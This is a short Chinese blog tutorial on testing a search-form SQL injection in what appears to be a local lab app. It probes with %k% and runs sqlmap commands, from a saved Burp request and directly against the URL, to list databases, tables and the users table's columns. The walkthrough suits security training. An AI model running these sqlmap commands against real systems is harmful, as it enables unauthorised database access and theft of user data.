验证是否有注入

我们直接输入一个字符k,点击搜索。
QQ截图20190404110620.png

提示未见异常
我们输入关键字%k%
效果如下:
QQ截图20190404110711.png
此时,我们可以得出,存在搜索型注入漏洞

攻击方式一

利用burp抓包,将包中的文件另存为22.txt
QQ截图20190404110915.png

22.txt放到sqlmap根目录 /usr/share/sqlmap

爆出数据库

sqlmap -r "22.txt" --dbs

QQ截图20190404111143.png

爆出表

sqlmap -r "22.txt" -D lou --tables

QQ截图20190404111319.png

爆出表结构

sqlmap -r "22.txt" -D lou -T users --columns

QQ截图20190404111547.png

方式二

不需要抓包保存文件的形式,直接执行命令

sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data "name=*&submit=%E6%90%9C%E7%B4%A2" --dbs

QQ截图20190404111950.png

最后修改:2023 年 08 月 04 日
如果觉得我的文章对你有用,请随意赞赏